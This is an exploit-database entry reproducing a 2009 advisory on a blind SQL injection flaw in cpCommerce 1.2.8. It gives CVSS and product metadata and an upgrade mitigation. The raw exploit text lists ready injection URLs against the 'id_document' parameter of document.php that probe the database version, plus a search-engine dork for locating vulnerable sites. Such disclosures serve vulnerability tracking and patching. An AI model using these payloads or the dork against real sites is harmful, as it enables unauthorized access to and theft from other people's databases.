header-logo
Suggest Exploit
vendor:
cpCommerce
by:
NoGe
8,8
CVSS
HIGH
Blind SQL Injection
89
CWE
Product Name: cpCommerce
Affected Version From: 1.2.8
Affected Version To: 1.2.8
Patch Exists: YES
Related CWE: N/A
CPE: a:cpcommerce:cpcommerce
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

cpCommerce 1.2.8 Blind SQL Injection Vulnerability

cpCommerce version 1.2.8 is vulnerable to Blind SQL Injection. An attacker can exploit this vulnerability by sending malicious SQL queries to the vulnerable parameter 'id_document' in the 'document.php' file. The dork for this vulnerability is 'Powered by cpcommerce'.

Mitigation:

Upgrade to the latest version of cpCommerce
Source

Exploit-DB raw data:

==========================================================================================


  [o] cpCommerce 1.2.8 Blind SQL Injection Vulnerability

       Software : cpCommerce version 1.2.8
       Vendor   : http://cpcommerce.cpradio.org/
       Download : http://cpcommerce.cpradio.org/downloads.php
       Author   : NoGe
       Contact  : noge[dot]code[at]gmail[dot]com
       Blog     : http://evilc0de.blogspot.com


==========================================================================================


  [o] Vulnerable file

       document.php



  [o] Exploit

       http://localhost/[path]/document.php?id_document=[SQL]
       http://localhost/[path]/document.php?id_document=1 and substring(@@version,1,1)=4
       http://localhost/[path]/document.php?id_document=1 and substring(@@version,1,1)=5



  [o] Dork

       "Powered by cpcommerce"


==========================================================================================


  [o] Greetz

       MainHack BrotherHood [ http://serverisdown.org ]
       OoN_BoY Paman bL4Ck_3n91n3 Angela Zhang
       H312Y yooogy mousekill }^-^{ loqsa zxvf
       skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke
       Special for Vrs-hCk [ thx cuy.. :p ]

        
==========================================================================================

# milw0rm.com [2009-04-16]

Navigation

Suggest Exploit

Services By CQR